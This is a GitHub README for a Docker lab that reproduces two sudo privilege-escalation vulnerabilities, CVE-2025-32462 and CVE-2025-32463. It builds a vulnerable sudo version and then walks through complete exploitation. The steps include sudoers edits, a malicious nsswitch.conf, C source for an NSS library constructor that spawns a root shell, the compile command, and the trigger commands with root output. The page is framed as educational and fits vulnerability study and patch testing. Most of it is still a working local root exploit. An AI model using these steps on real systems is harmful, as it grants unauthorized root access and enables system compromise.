Skip to content

MAAYTHM/CVE-2025-32462_32463-Lab

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
Dockerfile
Dockerfile
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
auto_cve_2025_32463.sh
auto_cve_2025_32463.sh
 
 

Repository files navigation

CVE-2025-32462 & CVE-2025-32463 – PoC Lab

This is a container-based lab and PoC for the following vulnerabilities in sudo:

  • CVE-2025-32462sudo -h host matching logic bypass
  • CVE-2025-32463sudo -R chroot NSS library escape

🔒 For educational purposes only. Do not use on systems you don’t own or have permission to test.

🔬 Original Research

🧠 Research Credit

  • Rich Mirch
    Stratascale Cyber Research Unit (CRU)
    @Stratascale

🧪 Lab Setup (Docker)

🔧 Dockerfile

FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \\
    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \\
                       pkg-config libssl-dev git nano gcc && \\
    rm -rf /var/lib/apt/lists/*

WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \\
    tar xzf sudo-1.9.16p2.tar.gz && \\
    cd sudo-1.9.16p2 && \\
    ./configure --disable-gcrypt --prefix=/usr && make && make install

RUN useradd -m -s /bin/bash pwn && echo 'pwn:pwn' | chpasswd

USER pwn
WORKDIR /home/pwn

CMD ["/bin/bash"]

🚀 Build & Run

docker build -t sudo-vuln-lab .
docker network create --subnet=172.190.0.0/16 sudolabnet
docker run -d --network sudolabnet --ip 172.190.0.3 --hostname 'lowpriv.test.local' --add-host highpriv.test.local:172.190.0.2 --name lowpriv sudo-vuln-lab tail -f /dev/null

extra setup for CVE-2025-32462

docker exec -u root -it lowpriv bash

# inside root shell of docker container
root@lowpriv:/home/pwn# echo 'Host_Alias HIGH = highpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'Host_Alias LOW = lowpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'pwn HIGH,!LOW = NOPASSWD:ALL' >> /etc/sudoers

Manual Exploitation

CVE-2025-32462

Normal Operation

pwn@lowpriv:~$ sudo id
Password: ^C
sudo: a password is required

Exploitation

pwn@lowpriv:~$ sudo -h highpriv.test.local id
uid=0(root) gid=0(root) groups=0(root)

pwn@lowpriv:~$ sudo -h highpriv.test.local hostname -f
lowpriv.test.local

CVE-2025-32463

Normal Operation

pwn@lowpriv:~$ sudo id
Password: 
pwn is not allowed to run sudo on lowpriv.

Preparation

# Step 1: Create the chroot directory structure
mkdir -p exploitDir/etc

# Step 2: Write a malicious nsswitch.conf to load our exploit module
echo 'passwd: /cve_2025_32463' > exploitDir/etc/nsswitch.conf

# Step 3: Create directory for the malicious NSS library
mkdir libnss_

# Step 4: Copy necessary group file into chroot environment
cp /etc/group exploitDir/etc/

# Step 5: Write the malicious NSS shared library source code
cat > cve_2025_32463.c <<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void GIVEMEROOT(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

# Step 6: Compile the malicious NSS shared library
gcc -shared -fPIC -Wl,-init,GIVEMEROOT -o libnss_/cve_2025_32463.so.2 cve_2025_32463.c

# Step 7: Launch sudo with chroot to trigger the vulnerability
sudo -R exploitDir HEHE RUN THIS AND GIVE ME ROOT

root@lowpriv:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)

Disclaimer

This PoC is for educational and authorized research only.

✍️ Author

PoC lab and Docker environment by MAAYTHM.

Research credit: Rich Mirch – Stratascale CRU

About

Docker PoC for CVE-2025-32462 & CVE-2025-32463 (sudo), based on Stratascale CRU research.

Topics

linux dockerfile proof-of-concept sudo cybersecurity poc chroot privilege-escalation sudoers cve-2025 cve-2025-32463 cve-2025-32462

Resources

Readme

License

MIT license
Activity

Stars

5 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages